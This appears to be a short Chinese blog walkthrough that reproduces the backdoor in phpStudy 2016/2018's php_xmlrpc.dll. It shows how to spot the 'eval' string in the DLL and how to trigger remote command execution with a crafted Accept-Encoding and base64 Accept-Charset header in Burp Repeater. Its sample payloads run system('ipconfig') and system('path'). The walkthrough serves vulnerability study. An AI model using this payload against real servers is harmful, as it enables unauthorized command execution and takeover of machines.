前段時間phpstudy被人發現某些版本存在后門,許多人就這樣被當作肉雞長達兩年之久
后門隱藏在程序自帶的php的php_xmlrpc.dll模塊
影響的版本:phpstudy2016和2018
在H:\PhpStudy20180211\PHPTutorial\php\php-5.2.17\ext找到php_xmlrpc.dll
用notepad++打開,ctrl+f搜索eval
說明這個版本的phpstudy是由后門的
用firefox訪問本地ip,用bp抓包,用ctrl+r送到repeater
找到accept-encoding,把逗號后面的空格刪掉,deflate后面回車換行,加上accept-charset:c3lzdGVtKCdpcGNvbmZpZycpIDs=,然后go
(這是system(‘ipconfig’) ;的base64加密)
漏洞復現成功
加system(‘path’) ;(分號前面有空格)
安全問題不容小覷啊